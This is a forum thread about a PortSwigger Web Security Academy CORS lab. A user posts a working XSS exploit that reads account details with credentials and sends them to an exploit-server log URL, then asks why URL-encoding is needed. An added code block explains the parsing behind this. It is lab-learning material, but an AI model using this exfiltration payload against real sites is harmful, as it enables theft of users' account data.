The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Weird need for URL encoding in XSS in CORS lab

Jaak | Last updated: Jun 29, 2022 09:20PM UTC

Hello, I have been doing the "Lab: CORS vulnerability with trusted insecure protocols". I think I understand the vulnerability pretty well; however, I had trouble getting the exploit to work until I looked at the solution. There seems to be a weird need (perhaps not so weird after all, since it works, but I have no clue why). In any case, this is the exploit script I tried (which I basically copied from https://portswigger.net/web-security/cors):

<script>
document.location="http://stock.0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();function reqListener() {location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>&storeId=1"
</script>

Notice the last part:

"{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>"

This exploit didn't work. However, in the solution, the exploit is exactly the same except for one '+' and one '<' URL-encoded in the last part mentioned above:

"{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='%2bthis.responseText;};%3c/script>"

Both need to be URL-encoded in order for the exploit to work. If the '<' isn't URL-encoded, the XSS doesn't work at all, meaning there's no "script" in the response HTML. If the '+' isn't URL-encoded, the XSS does work in theory but doesn't properly append 'this.responseText' to the URL. Now, I googled a little and I guess the plus sign must be URL-encoded since 'the plus sign is used as shorthand for a space in query parameters'. But I cannot make any sense of why the '<' needs to be URL-encoded.
I have tried around a little and it seems like either the '<' or the '>' of the '/script' tag needs to be URL-encoded. Does anybody know an answer to this? It seems like this is an issue worth understanding for any XSS challenges. It would be very much appreciated :)
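
The two parsing behaviours the question turns on, as an added example (editor's code, not from the post or from PortSwigger's lab; the hostname is a placeholder): form-style query decoding turns a bare '+' into a space, and the HTML tokenizer closes a <script> element at the first "</script" it meets even inside a JavaScript string literal, which is why encoding either the '<' or the '>' of the closing tag keeps the exploit page's own script intact.

```javascript
// Added example, not code from the forum post or from PortSwigger's lab.
// Two separate parsing steps explain why the lab solution encodes '+' as %2b
// and the '<' of </script> as %3c; the hostname below is a placeholder.
// Step 1: form-style query decoding. A bare '+' means a space, so the
// vulnerable page receives "' this.responseText" unless '+' is sent as %2b.
function decodeQueryParam(query, name) {
  return new URLSearchParams(query).get(name); // '+' -> ' ', %XX -> char
}

// Step 2: HTML "script data" tokenising. Inside a <script> element the
// parser ends the element at the first "</script" followed by whitespace,
// '/' or '>' (case-insensitive), even when it sits inside a JS string.
function scriptDataTerminator(content) {
  const m = /<\/script[\s\/>]/i.exec(content);
  return m ? m.index : -1;
}

// Builds the exploit-server page the way the lab does: one inline script
// whose JS string literal carries the whole target URL (constructed sample).
function wrapInInlineScript(payloadTail) {
  return '<script>document.location="http://target.invalid/?productId=4' +
    payloadTail + '"</script>';
}

// True when the first terminator is not the page's own closing tag, i.e.
// the string literal closed the <script> early and the exploit page breaks.
function closesPrematurely(html) {
  const body = html.slice(html.indexOf(">") + 1);
  const first = scriptDataTerminator(body);
  return first !== -1 && first < body.lastIndexOf("</script>");
}

// Defensive counterpart: a server that interpolates data into an inline
// script must neutralise "</" (for JSON, emit "<\/") so data can never
// terminate the element.
function escapeForInlineScript(text) {
  return text.replace(/<\//g, "<\\/");
}
// The three tails from the thread: raw, the solution's, and '>'-encoded.
const RAW_TAIL = "'+this.responseText;};</script>";
const SOLUTION_TAIL = "'%2bthis.responseText;};%3c/script>";
const GT_ENCODED_TAIL = "'%2bthis.responseText;};</script%3e";
console.log(decodeQueryParam("productId=4" + RAW_TAIL, "productId"));      // "4' this.responseText;};</script>"
console.log(decodeQueryParam("productId=4" + SOLUTION_TAIL, "productId")); // "4'+this.responseText;};</script>"
console.log(closesPrematurely(wrapInInlineScript(RAW_TAIL)));        // true
console.log(closesPrematurely(wrapInInlineScript(SOLUTION_TAIL)));   // false
console.log(closesPrematurely(wrapInInlineScript(GT_ENCODED_TAIL))); // false
```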

Ben, PortSwigger Agent | Last updated: Jul 01, 2022 07:03AM UTC